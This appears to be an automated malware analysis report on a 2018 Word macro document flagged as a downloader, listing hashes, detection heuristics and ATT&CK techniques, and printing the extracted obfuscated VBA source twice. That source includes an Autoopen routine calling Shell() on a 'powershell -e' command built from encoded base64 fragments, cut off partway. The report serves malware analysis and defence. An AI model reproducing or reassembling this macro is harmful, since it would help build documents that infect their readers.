Office (OLE) malware analysis — malicious · 4ddcdbd03ee318a0

MALICIOUS

Office (OLE)

112.0 KB Created: 2018-06-11 15:00:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 47bbde2b0fc0e3048217f920ed606047 SHA-1: 3447fbc7e0536f299c5b17144969f71f91c930dc SHA-256: 4ddcdbd03ee318a0503bc5c2ef4b0d4ac783f4a1069ac7140471f0c457b703e9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating a Shell() call within the VBA macros. The Autoopen subroutine and the idABiDi function are designed to execute a command constructed from concatenated strings. This command likely downloads and executes a second-stage payload, as suggested by the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'. The VBA macro is the primary mechanism for this malicious execution.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10701 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10701 bytes
SHA-256: `9074a4a4f2dbb426943070cc34c38fbd567bc9c3b9242be8a744b227d9162558`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "djzcjasQD" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function idABiDi() On Error Resume Next zWJSU = CLng(59606 * CSng(NuQfM + ChrB(JcNawH + CInt(93657)))) ZdDMl = Int(whFMYY) TstLaj = dKEXfS iFCHo = GYtGFj QfpEHn = pjUPV EbPYfh = jRcDE ibvzmF = CLng(83390 * CSng(bwUAQr + ChrB(Xuknm + CInt(25305)))) iIVaXQ = Int(wClzX) dukhJ = jccuYP FIWrQS = nwmiM aodwjA = hjdKDd jNCOw = hLzbK idABiDi = oFqHAHbXS + Shell(MtniSawpauv + Chr(SLVjIFuf + vbKeyP + FLqEmW) + "owers" + sLMDBWsAt + kNiSTMjU + bPDRPCHCDHE + oSnsHHRV + noXtpi, 83444 - 83444) hAVjH = CLng(12105 * CSng(bDswj + ChrB(XWJWf + CInt(24175)))) mKqauX = Int(BAPqCm) TrLCV = iBEoO CYoYo = OViWK mjYTbo = wuzEf UJIFkG = LYVIN End Function Sub Autoopen() On Error Resume Next aYnQiw = CLng(63703 * CSng(PlfOa + ChrB(mRbEU + CInt(17197)))) UIGQzQ = Int(jOOPG) NdJiTH = jEYdrK PtwQoE = GPjzj YjBWPI = DJIzlM uQkdY = atpSwb idABiDi wGNci = CLng(73219 * CSng(ZADBNi + ChrB(mFlwib + CInt(87278)))) qiDat = Int(iqiYn) cwwfT = lluNjP DooDTT = IrQiZ sWvJU = acHpJG iqIMdv = kqQqnO End Sub Attribute VB_Name = "nzkjNGQ" Function sLMDBWsAt() On Error Resume Next khvfj = CLng(113 * CSng(jjHGFc + ChrB(OfOPE + CInt(88014)))) kqhUO = Int(zWBoML) TwjuW = zZKvZQ CoaIVt = MzrOK BkKfT = uXkQvU WujauH = mvJvt wjJjiv = "HeLL -e" + " IAAuACAAK" + "AAgACQAZQBu" + "AF" + "YAOgBDAE8ATQBz" SzsUG = CLng(39453 * CSng(EjPPfb + ChrB(WESXio + CInt(54757)))) SjYwG = Int(fFaOl) auiQK = kopiRv ciidm = EqvjM JNiYap = taEbZ NDDni = OddiXz rHsJO = "AHAARQBjAF" + "sANAA" + "sADEANQAsADIA" + "NQBdAC0A" + "agBvAGkAbgAnA" + "CcAKQAgACgAbgBF" + "AH" + "cALQBvAEIASgBFA" + "EMAdAAgACA" + "AaQBPAC4AYw" owhLfO = CLng(33930 * CSng(ANGQO + ChrB(PCtXHI + CInt(51599)))) NACNt = Int(SjiHbw) ELPZN = hMpzX wzajH = oBPjj SUTCT = zoQoLq wuAtLY = itvwr wLDAWhndL = "BPAG0" + "AcAByAGUAcwBzA" + "EkAbw" + "Bu" brnwlV = CLng(59611 * CSng(Hsoft + ChrB(wjDJn + CInt(69429)))) IVnID = Int(diYZU) WDHBU = qLXrC NSNEv = mLHqSW nhKBcj = TVWHr iFzYiR = bvlwZ zFzPRwAtpsm = "AC4AZAB" + "lAEYATABhA" + "FQARQBzAFQAc" + "gBFAG" + "EAbQAoACA" + "AWwBzAHkAcwB" hnJCfk = CLng(70848 * CSng(hWfKu + ChrB(itrvG + CInt(24919)))) IhNjI = Int(DYrvN) uBjJSq = GfBiR nJjiD = qMUZGv Xjhip = RjAGCj FjGiG = wVUqTp UFLrHpZMaA = "0AE" + "UA" + "TQAuAE" + "kATwAu" + "AG0ARQBNAG8AU" + "gBZAHMAdABS" + "AGUAYQBN" GXOacZ = CLng(26473 * CSng(TnZBMH + ChrB(imDjwf + CInt(69342)))) GlSHz = Int(CsNoCU) UaddVZ = whhuqw inmrIW = IoJSN QuLNK = FKMZDd zKYDY = DHUFa CWGTbYPJ = "AF0AWwBjAE8" + "AbgB2AGUA" + "cgB0AF0" + "AOg" + "A6AGYAUgB" + "vAE0AYgBBAFMA" + "RQA2AD" + "QAUwBUAFIAa" + "QBuAEcAKAAgA" tziMlT = CLng(20221 * CSng(XVCVU + ChrB(DqjWNi + CInt(26376)))) YEjll = Int(Ktwok) Qpawa = tVicI inNMb = ssjrZa AiIzdY = kEUNQ vHpsTv = jCzozR sPChrDYd = "CcAV" + "gBWAEIAaAB" + "TADgATQ" + "B3AEYA" + "UAB" + "3A" + "HI" + "AKwBWAEQAbw" + "BoAGkAN" sLMDBWsAt = wjJjiv + rHsJO + wLDAWhndL + zFzPRwAtpsm + UFLrHpZMaA + CWGTbYPJ + sPChrDYd End Function Function kNiSTMjU() On Error Resume Next wsjYQA = CLng(42106 * CSng(XkYED + ChrB(SiTzwu + CInt(3884)))) CrXddv = Int(kUzMaR) YvzQLW = ETPsBO doBXw = ppBnW cmQYs = daGYCf fAwXIl = hZHfwo JWwWiZLB = "QB4AE8AawBWA" + "FgAQgBKADEAT" + "wB" + "jAEc" + "Aeg" + "BWAFcAVgBFA" + "FUAbwBh" + "AFQ" FCiuKu = CLng(72790 * CSng(znvXOY + ChrB(SEmVpQ + CInt(23251)))) RtBtsD = Int(lZEzXX) irlwm = KckWE GCscwN = KRAIAt SCVTOA = uaukt JhpIfp = wctwFm vizsmsUXb = "AeABiA" + "GMAMgBXAEoAaQ" + "BWADUAMgB" + "zADIAeAAvADIAN" + "ABzADMAYw" NGdjkC = CLng(91784 * CSng(IGRHDd + ChrB(czsFi + CInt(68463)))) bsdLvu = Int(JYNcVC) wLAqiZ = jqXlV AvEzDv = ilFZHB whEfha = jmrPA EsCGZ = JoOTNY poozOpvZGM = "BBAHYARAA5" + "ADYA" + "NwB1ADMA" + "ZgBIAEI" + "AWgBQAFI" TJLFbi = CLng(63501 * CSng(aBmrDu + ChrB(UINkD + CInt(70937)))) mizzhr = Int(kOqGH ... (truncated)

SHA-256: 9074a4a4f2dbb426943070cc34c38fbd567bc9c3b9242be8a744b227d9162558

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "djzcjasQD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function idABiDi()
On Error Resume Next
zWJSU = CLng(59606 * CSng(NuQfM + ChrB(JcNawH + CInt(93657))))
ZdDMl = Int(whFMYY)
TstLaj = dKEXfS
iFCHo = GYtGFj
QfpEHn = pjUPV
EbPYfh = jRcDE
ibvzmF = CLng(83390 * CSng(bwUAQr + ChrB(Xuknm + CInt(25305))))
iIVaXQ = Int(wClzX)
dukhJ = jccuYP
FIWrQS = nwmiM
aodwjA = hjdKDd
jNCOw = hLzbK
idABiDi = oFqHAHbXS + Shell(MtniSawpauv + Chr(SLVjIFuf + vbKeyP + FLqEmW) + "owers" + sLMDBWsAt + kNiSTMjU + bPDRPCHCDHE + oSnsHHRV + noXtpi, 83444 - 83444)
hAVjH = CLng(12105 * CSng(bDswj + ChrB(XWJWf + CInt(24175))))
mKqauX = Int(BAPqCm)
TrLCV = iBEoO
CYoYo = OViWK
mjYTbo = wuzEf
UJIFkG = LYVIN
End Function
Sub Autoopen()
On Error Resume Next
aYnQiw = CLng(63703 * CSng(PlfOa + ChrB(mRbEU + CInt(17197))))
UIGQzQ = Int(jOOPG)
NdJiTH = jEYdrK
PtwQoE = GPjzj
YjBWPI = DJIzlM
uQkdY = atpSwb
idABiDi
wGNci = CLng(73219 * CSng(ZADBNi + ChrB(mFlwib + CInt(87278))))
qiDat = Int(iqiYn)
cwwfT = lluNjP
DooDTT = IrQiZ
sWvJU = acHpJG
iqIMdv = kqQqnO
End Sub


Attribute VB_Name = "nzkjNGQ"
Function sLMDBWsAt()
On Error Resume Next
khvfj = CLng(113 * CSng(jjHGFc + ChrB(OfOPE + CInt(88014))))
kqhUO = Int(zWBoML)
TwjuW = zZKvZQ
CoaIVt = MzrOK
BkKfT = uXkQvU
WujauH = mvJvt
wjJjiv = "HeLL -e" + " IAAuACAAK" + "AAgACQAZQBu" + "AF" + "YAOgBDAE8ATQBz"
SzsUG = CLng(39453 * CSng(EjPPfb + ChrB(WESXio + CInt(54757))))
SjYwG = Int(fFaOl)
auiQK = kopiRv
ciidm = EqvjM
JNiYap = taEbZ
NDDni = OddiXz
rHsJO = "AHAARQBjAF" + "sANAA" + "sADEANQAsADIA" + "NQBdAC0A" + "agBvAGkAbgAnA" + "CcAKQAgACgAbgBF" + "AH" + "cALQBvAEIASgBFA" + "EMAdAAgACA" + "AaQBPAC4AYw"
owhLfO = CLng(33930 * CSng(ANGQO + ChrB(PCtXHI + CInt(51599))))
NACNt = Int(SjiHbw)
ELPZN = hMpzX
wzajH = oBPjj
SUTCT = zoQoLq
wuAtLY = itvwr
wLDAWhndL = "BPAG0" + "AcAByAGUAcwBzA" + "EkAbw" + "Bu"
brnwlV = CLng(59611 * CSng(Hsoft + ChrB(wjDJn + CInt(69429))))
IVnID = Int(diYZU)
WDHBU = qLXrC
NSNEv = mLHqSW
nhKBcj = TVWHr
iFzYiR = bvlwZ
zFzPRwAtpsm = "AC4AZAB" + "lAEYATABhA" + "FQARQBzAFQAc" + "gBFAG" + "EAbQAoACA" + "AWwBzAHkAcwB"
hnJCfk = CLng(70848 * CSng(hWfKu + ChrB(itrvG + CInt(24919))))
IhNjI = Int(DYrvN)
uBjJSq = GfBiR
nJjiD = qMUZGv
Xjhip = RjAGCj
FjGiG = wVUqTp
UFLrHpZMaA = "0AE" + "UA" + "TQAuAE" + "kATwAu" + "AG0ARQBNAG8AU" + "gBZAHMAdABS" + "AGUAYQBN"
GXOacZ = CLng(26473 * CSng(TnZBMH + ChrB(imDjwf + CInt(69342))))
GlSHz = Int(CsNoCU)
UaddVZ = whhuqw
inmrIW = IoJSN
QuLNK = FKMZDd
zKYDY = DHUFa
CWGTbYPJ = "AF0AWwBjAE8" + "AbgB2AGUA" + "cgB0AF0" + "AOg" + "A6AGYAUgB" + "vAE0AYgBBAFMA" + "RQA2AD" + "QAUwBUAFIAa" + "QBuAEcAKAAgA"
tziMlT = CLng(20221 * CSng(XVCVU + ChrB(DqjWNi + CInt(26376))))
YEjll = Int(Ktwok)
Qpawa = tVicI
inNMb = ssjrZa
AiIzdY = kEUNQ
vHpsTv = jCzozR
sPChrDYd = "CcAV" + "gBWAEIAaAB" + "TADgATQ" + "B3AEYA" + "UAB" + "3A" + "HI" + "AKwBWAEQAbw" + "BoAGkAN"
sLMDBWsAt = wjJjiv + rHsJO + wLDAWhndL + zFzPRwAtpsm + UFLrHpZMaA + CWGTbYPJ + sPChrDYd
End Function
Function kNiSTMjU()
On Error Resume Next
wsjYQA = CLng(42106 * CSng(XkYED + ChrB(SiTzwu + CInt(3884))))
CrXddv = Int(kUzMaR)
YvzQLW = ETPsBO
doBXw = ppBnW
cmQYs = daGYCf
fAwXIl = hZHfwo
JWwWiZLB = "QB4AE8AawBWA" + "FgAQgBKADEAT" + "wB" + "jAEc" + "Aeg" + "BWAFcAVgBFA" + "FUAbwBh" + "AFQ"
FCiuKu = CLng(72790 * CSng(znvXOY + ChrB(SEmVpQ + CInt(23251))))
RtBtsD = Int(lZEzXX)
irlwm = KckWE
GCscwN = KRAIAt
SCVTOA = uaukt
JhpIfp = wctwFm
vizsmsUXb = "AeABiA" + "GMAMgBXAEoAaQ" + "BWADUAMgB" + "zADIAeAAvADIAN" + "ABzADMAYw"
NGdjkC = CLng(91784 * CSng(IGRHDd + ChrB(czsFi + CInt(68463))))
bsdLvu = Int(JYNcVC)
wLAqiZ = jqXlV
AvEzDv = ilFZHB
whEfha = jmrPA
EsCGZ = JoOTNY
poozOpvZGM = "BBAHYARAA5" + "ADYA" + "NwB1ADMA" + "ZgBIAEI" + "AWgBQAFI"
TJLFbi = CLng(63501 * CSng(aBmrDu + ChrB(UINkD + CInt(70937))))
mizzhr = Int(kOqGH
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.